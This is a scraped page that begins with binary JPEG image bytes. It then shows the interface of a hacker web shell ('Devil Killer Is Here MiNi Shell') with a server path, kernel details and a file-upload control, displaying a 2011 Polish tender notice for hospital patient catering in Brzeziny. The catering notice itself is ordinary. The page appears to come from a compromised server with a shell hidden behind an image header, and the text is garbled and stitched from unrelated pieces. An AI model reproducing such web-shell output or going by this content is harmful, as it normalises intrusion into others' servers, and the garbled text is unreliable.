JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110609/150934-N-2011.html

<p class="kh_header"><b>Brzeziny: USŁUGI ŻYWIENIA PACJENTÓW
NIEPUBLICZNEGO  ZAKŁADU OPIEKI ZDROWOTNEJ
SZPITALA  POWIATOWEGO  W  BRZEZINACH</b><br>
<b>Numer ogłoszenia: 150934 - 2011; data zamieszczenia: 09.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Zdrowia w Brzezinach - Spółka z ograniczoną odpowiedzialnością , ul. M.Curie-Skłodowskiej 6, 95-060 Brzeziny, woj. łódzkie, tel. 46 875 25 01, faks 46 874 26 06.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI ŻYWIENIA PACJENTÓW
NIEPUBLICZNEGO  ZAKŁADU OPIEKI ZDROWOTNEJ
SZPITALA  POWIATOWEGO  W  BRZEZINACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis Przedmiotu Zamówienia zawiera zasady przygotowywania i dostarczania posiłków dla pacjentów Niepublicznego Zakładu Opieki Zdrowotnej w Brzezinach (zwanym dalej Szpitalem).

I . Zakres usługi  obejmuje;
	Sporządzanie  posiłków z własnych produktów dla pacjentów z uwzględnieniem diet, zgodnie z obowiązującymi normami żywieniowymi wg instytutu Żywienia i Żywności, jak również przepisami prawa w zakresie higieny żywienia norm HACCP.
	Przygotowanie i dystrybucję posiłków z podziałem na diety według zamówień z poszczególnych Oddziałów z tym zastrzeżeniem, iż w przypadku pacjentów z dietą podstawową Wykonawca zapewni w zakresie posiłku obiadowego 2 różne zestawy do wyboru.
	Poza posiłkami objętymi umową o zamówienie publiczne  Wykonawca zapewni dodatkowe tj.; 2 do wyboru - zestawy   obiadów - z których będą mogli skorzystać pacjenci hospitalizowani za wynagrodzeniem płaconym oddzielnie przez każdego pacjenta. 
	Transport posiłków do szpitala w termosach i innych szczelnie zamkniętych pojemnikach,
	Dystrybucję posiłków do rozdzielni posiłków i odbiór termosów,
	Dystrybucję posiłków do oddziałów szpitala oraz do łóżek pacjentów ( na warunkach określonych w punktach : 10, 11 i 12),
	Usuwanie brudnych naczyń i sztućców od pacjentów, mycie ich i dezynfekcję, naczynia oraz sztućce zapewnia Wykonawca,
	Usuwanie resztek pokarmu oraz zagospodarowaniu ich lub utylizacji zgodnie z obowiązującymi przepisami,
	Mycie termosów zbiorczych w siedzibie wykonawcy,



II. Zamówienie dotyczy następujących oddziałów;
	Wewnętrzny z Pododdziałem Kardiologii
	Chirurgiczny
	Urazowo-Ortopedyczny
	Oddział Anestezjologii i Intensywnej Terapii
	Neonatologiczno-Pediatryczny
	Położniczo-ginekologiczny
	Neurologiczny
	Szpitalny Oddział Ratunkowy
III. Ilość i rodzaj posiłków;
	Średnie  miesięczne zapotrzebowanie na posiłki wynosi   3.000 osobodni, w okresie 12 miesięcy - średnio 36 000 osobodni.
	Zamawiający zastrzega sobie możliwość zakupu innej ilości posiłków niż podana powyżej, w zależności od ilości leczonych pacjentów,
	Dodatkowo Wykonawca zobowiązany jest w ramach zamówienia do przygotowania - dwukrotnie w ciągu roku - cateringu (zimny bufet np. spotkanie okolicznościowe organizowane przez  Zarząd PCZ w Brzezinach) . Wartość nominalna jednokrotnej usługi    nie może być niższa niż 2.000,00 PLN brutto.
	Posiłki zamawiane są według następujących diet;
Dieta podstawowa,
Dieta lekkostrawna,
Dieta cukrzycowa,
Dieta wrzodowa,
Dieta papkowata,
Dieta płynna(lekkostrawna do sondy)
Diety specjalne np.; ziemniaczana-ustalane indywidualnie z dietetykiem.

1.	Przybliżone ilości gramowe podstawowych produktów w poszczególnych racjach pokarmowych (śniadania, obiady, kolacje)
2.	

LP	Nazwa grupy i rodzaj produktu	Zastosowanie	Ilość w gramach
1.	Produkty zbożowe		
	- pieczywo	Główne danie	150-200
		Dodatek do zup	  80-100
	- makaron ,kasza, ryż (sucha)	Samodzielne danie	  80-100
2.	Warzywa, owoce		
	- ziemniaki	Dodatek do drugiego dania	300-400
	- inne warzywa	Dodatek do drugiego dania 	150-200
	- pomidory-ogórek	Dodatek do pieczywa	100-150
	- rośliny strączkowe(suche)	Samodzielne danie	100-150
	- owoce	Dodatek	150-200
3.	Mleko i produkty mleczne		
	- mleko	Zupa mleczna	400
		Jako napój	300
	- jogurty	Dodatek do pieczywa	150
	- sery	Dodatek do pieczywa	50-60
4.	Mięso, wędliny, ryby oraz jaja		
	-mięso	Gotowane z kością	150
		Pieczeń	100-120
		Bitki, kotlety	100-120
		Wątróbka	80-100
		Kurczak, kura	200-250
	- wędliny	Dodatek do pieczywa	60
	- ryby	Gotowane, smażone	200-300
	- jaja	Dodatek	1-2 szt
5.	Tłuszcze		
	-masło	Do chleba	20
6.	Cukier, słodycze		
	- miód, dżem, marmolada	Dodatek do pieczywa	40-50
7.	Inne		
	- pasztety	Dodatek do pieczywa	70
	- pasty	Dodatek do pieczywa 	70


2. Dzienne zapotrzebowanie energetyczne dla następujących grup pacjentów winno wynosić około;

Grupa pacjentów	Zalecana ilość Kcal/dziennie
Dzieci 1-3 lat	1000-1300
Dzieci 4-6 lat	1400-1700
Dzieci 7-9 lat	1900-2100
Dzieci powyżej 9 lat	1800
Dorośli	2500
   
3.  W diecie cukrzycowej zawartość wymienników węglowodanowych (WW) w dziennej racji pokarmowej nie powinna przekraczać granic od 26 do 30 WW.
4.  Pacjenci na diecie cukrzycowej i wrzodowej oraz dzieci  otrzymywać będą pięć posiłków dziennie tj.3 posiłki podstawowe oraz drugie śniadanie i podwieczorek
5.  Do obiadu Wykonawca doda kompot ,a do pozostałych posiłków kawę, herbatę lub kakao z cukrem. Zapewnia również opakowania kleiku suchego w zależności od zamówienia.
6.  Wykonawca zobowiązany jest do;
	Przestrzegania norm żywieniowych zalecanych przez Instytut Żywności i Żywienia, dla poszczególnych grup ludności przebywających w szpitalu, wg wieku, płci, i stanu fizjologicznego,
	Stosowania zasad racjonalnego żywienia chorych i prozdrowotnego charakteru żywienia
	Pozostawiania próbek żywieniowych w siedzibie Wykonawcy zgodnie z obowiązującymi przepisami,
	Posiadania umowy  na utylizację odpadów pokonsumpcyjnych.
   IV. Zasady zamawiania posiłków;
1.	Ilość i rodzaj posiłków wykonawca przygotowuje na podstawie zapotrzebowania żywnościowego z poszczególnych oddziałów szpitala przygotowanego i podpisanego  przez dietetyczkę lub osobę upoważnioną przez Zamawiającego. Zapotrzebowanie określa dzienne zamówienia na śniadania, obiady, kolacje.
2.	W zakresie posiłków obiadowych (dieta podstawowa) Wykonawca przygotowuje dwa  rodzaje zestawów obiadowych (do wyboru pacjenta) na podstawie  zapotrzebowania żywnościowego z   poszczególnych oddziałów szpitala przygotowanego i podpisanego  przez dietetyczkę lub osobę upoważnioną przez Zamawiającego
3.	Wykonawca zapewni rezerwę posiłków w siedzibie Zamawiającego dla pacjentów przyjmowanych do oddziałów w godzinach popołudniowych i nocnych w ilości ustalanej na bieżąco z Zamawiającym.
4.	 Zapotrzebowanie żywnościowe odbierać będzie codziennie( na dzień następny) przedstawiciel wykonawcy do godz. 1100.
5.	Zleceniodawca zastrzega sobie prawo do telefonicznej korekty zapotrzebowania na bieżący dzień do godz.1000.
6.	Potwierdzenie korekty przedstawiciel Wykonawcy odbiera w trakcie przywozu kolejnego posiłku
Wykonawca jest zobowiązany do dostarczania jadłospisów dekadowych z uwzględnieniem   sezonowości dla wszystkich oddziałów i dwóch różnych zestawów posiłków obiadowych do wyboru.
Jadłospis powinien zawierać;
	Dzienne zestawienie posiłków w rozbiciu na dietę podstawową, cukrzycową, lekkostrawną
	Ilość wagową produktów
	Zawartość innych diet należy dostarczyć, na bieżąco w zależności od zamówienia z poszczególnych oddziałów.
	Opisywać dietę płynną do sondy pod względem ilości poszczególnych produktów i zawartych w nich składników odżywczych.
6. Zamawiający zobowiązuje Wykonawcę, iż poza posiłkami objętymi umową o zamówienie 
    publiczne  Wykonawca  zapewni dodatkowe tj.; 2 do wyboru - zestawy  obiadów    - z których 
    będą mogli skorzystać pacjenci hospitalizowani za wynagrodzeniem 
    płaconym oddzielnie przez każdego pacjenta, w tym  przypadku Wykonawca zbiera
    zamówienie  bezpośrednio od pacjentów.
V. Zasady dostarczania posiłków;
1.	Zamawiający wymaga dostarczania posiłków do Szpitala codziennie i do oddziałów w godz.
	Śniadania;       700--800
	Obiady;          1200--1300
	Kolacja;          1730--1800

2.	Posiłki Wykonawca dostarcza na swój koszt i swoje ryzyko w szczelnie zapakowanych,  zaplombowanych pojemnikach z opisem na pojemniku do jakiego oddziału jest pojemnik kierowany.  Zapisy dotyczące transportu przechowywane będą w siedzibie wykonawcy.

Pojemniki i naczynia do transportu posiłków muszą posiadać atest dopuszczający do kontaktu z żywnością oraz posiadać właściwości pozwalające  na utrzymywanie  temperatury.(wraz z ofertą należy złożyć   kserokopię atestu  lub oświadczenie o jego posiadaniu),nie mogą być uszkodzone i brudne.

3.	Wykonawca zapewni odpowiednią ilość estetycznych i stabilnych naczyń i sztućców dla pacjentów w poszczególnych oddziałach, oraz czajników do gotowania wody dla pacjentów(minimum 1 czajnik w oddział)
4.	Wykonawca zapewni odpowiednią ilość naczyń jednorazowych dla pacjentów reżimowych w poszczególnych oddziałach w przypadku takich potrzeb.
5.	Wykonawca zapewni odpowiednią ilość środków do mycia i dezynfekcji naczyń, sztućców oraz sprzętu i środków  do mycia i dezynfekcji pomieszczeń kuchenek oddziałowych.
6.	Wykonawca zobowiązuje się do codziennego odbioru  odpadów pokonsumpcyjnych i utylizowania ich zgodnie z przepisami. Zabezpiecza również czyste zamykane hermetycznie i dezynfekowane  pojemniki na te odpady.
7.	Odpady pokonsumpcyjne od chorych izolowanych zamawiający utylizuje we własnym zakresie zgodnie z odpowiednimi instrukcjami. 
8.	Pojemniki, w których transportowane są posiłki Wykonawca odbiera codziennie. Mycie i dezynfekcja pojemników odbywa się w siedzibie  Wykonawcy.
9.	Posiłki do oddziałów  i łóżek pacjentów dostarcza personel Wykonawcy posiadający odpowiedni strój ochronny i  aktualne badania lekarskie. Wykonawca zobowiązany jest do zapewnienia zastępstwa w sytuacji nieobecności personelu transportującego posiłki do oddziałów i z kuchenek oddziałowych  do pacjentów.  
10.	 Wykonawca zobowiązuje się do  wydzierżawienia od Zamawiającego pomieszczeń kuchenek oddziałowych wraz z wyposażeniem oraz do bieżących  napraw i konserwacji tego wyposażenia .
11.	Opłata ryczałtowa w skali miesiąca  za czynsz dzierżawny za wszystkie pomieszczenia kuchenek, dzierżawę mebli i sprzętu oraz media  wynosi:  
1.	Czynsz za dzierżawę pomieszczeń kuchenek oddziałowych w wysokości: 
      81,33 x 10 zł  = 813,30 zł + podatek VAT w wysokości 23 %,
2.  Opłata za dzierżawę mebli i sprzętu w wysokości:
	400,00 zł + podatek VAT w wysokości 23 %,
3.   Zużycie energii elektrycznej:
	1943 kW  x 0,405 zł = 786,91 zł + podatek VAT 23 % ,
4.   Woda oraz odprowadzanie ścieków:
	13,62 m 3 x 3,30 zł = 44,94 zł + podatek VAT 8 %
	13,62 m 3 x 4,60 zł = 62,65 zł + podatek VAT 8 %,
5.   Podgrzanie wodzy:
	7,02 m 3 x 16,20 zł = 113,72 zł + podatek VAT 23 %
6.  Centralne ogrzewanie:
	81,33 m3 x 4,50 zł = 365,98 zł + podatek VAT 23 %

Razem: 	2.479,91 zł + podatek VAT 23 % 
		   107,59 zł + podatek VAT 8 %.

     12. Szczegółowe warunki dzierżawy ( w tym wysokość czynszu i opłat) kuchenek zostanie 
uregulowana w odrębnej umowie pomiędzy Zamawiającym, a Wykonawcą.

   VI. Zasady kontroli realizacji zamówienia;
       1.Do kontroli zakresu świadczonych usług ze strony Zamawiającego  uprawnieni są;
- Kierownik Szpitala 
- Dietetyczka
- Pielęgniarka Epidemiologiczna, Pielęgniarka Naczelna
- Pielęgniarki Oddziałowe poszczególnych oddziałów.

2. Zamawiający zastrzega sobie prawo do kontroli w zakresie;
- Zgodności dostarczanych posiłków z wymogami zamawiającego pod względem wagowym,
- Utrzymania temperatury posiłków (zupy 60-700C drugie danie 55-600C)
- Świeżość posiłków,
- Bieżącej kontroli w swojej siedzibie pod względem sanitarno-epidemiologicznym oraz do wykonywania okresowych , płatnych przez Wykonawcę, badań na czystość mikrobiologiczną z urządzeń, sprzętu i powierzchni kontaktujących się z żywnością oraz rąk personelu
o r a z 
- zastrzega sobie prawo wglądu do dokumentacji dotyczącej krytycznych punktów kontroli.
Zamawiający ma prawo do przeprowadzenia auditu w pomieszczeniach Wykonawcy.
Wykonawca ponosi prawną i materialną odpowiedzialność za wykonywanie usługi przed uprawnionymi organami kontroli zewnętrznej oraz przed Zamawiającym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać decyzję wydaną przez właściwy Państwowy Inspektorat Sanitarny potwierdzającą spełnienie wymagań koniecznych do prowadzenia zakładu żywienia zbiorowego z uwzględnieniem żywienia pacjentów szpitala 
Ocena spełniania warunku nastąpi na podstawie przedłożonego dokumentu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał lub wykonywał w okresie ostatnich 3 lat przed upływem terminu składania ofert minimum dwie  usługi na rzecz żywienia zbiorowego    i wartości stanowiącej nie mniej niż łącznie 150.000,00 zł brutto rocznie  wraz z załączeniem dokumentów potwierdzających, że usługi  zostały wykonane lub są wykonywane należycie.
Ocena spełniania warunku nastąpi na podstawie przedstawionych usług  w załączniku  do SWZ oraz  przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje odpowiednim zapleczem personalnym   - uprawnionym do zapewnienia właściwej i sprawnej realizacji zamówienia, osobami zdolnymi do wykonania  zamówienia  będącego  przedmiotem świadczenia usług w zakresie żywienia pacjentów. 
W celu potwierdzenia spełnienia tego warunku Wykonawca przedłoży wykaz planowanej ilości osób, które będą uczestniczyć w wykonywaniu zamówienia  oraz  zakres wykonywanych przez nich czynności, ze szczególnym uwzględnieniem dietetyka, szefa lub kierownika kuchni tj. osób odpowiedzialnych za nadzór nad właściwą realizacją umowy w zakresie żywienia - w stosunku do tych osób należy podać ich kwalifikacje zawodowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
a)	Posiada zdolność kredytową lub środki finansowe w wysokości, co najmniej 200 000,00 zł,
b)	Posiada  ubezpieczenia OC w zakresie prowadzonej działalności gospodarczej o wartości min. 500.000 zł, obejmującą usługi żywienia -  polisa , a w przypadku  jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej  działalności, będącej przedmiotem zamówienia. 
Ocena spełniania warunku w zakresie pkt.  4 a)  będzie dokonywana na podstawie    złożonego  oświadczenia , natomiast pkt. 4 b) na podstawie przedłożonego dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- opinię wydaną przez właściwy Państwowy  Inspektorat Sanitarny dotyczącą spełnienia wymogów sanitarnych koniecznych przy przewozie posiłków,
- Certyfikat HACCP (jeżeli posiada) lub dokumentację o wdrożeniu  i przestrzeganiu zasad systemu HACCP,
Ocena spełniania warunku nastąpi na podstawie złożonych dokumentów i oświadczeń.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty - Załącznik nr 1.
2. Pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów (jeżeli dotyczy).
3.  Kserokopię umowy  na utylizację odpadów pokonsumpcyjnych.
4. Dokument prawa własności lokalu, w którym będzie realizowane zamówienie, lub aktualną umowę   najmu lokalu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
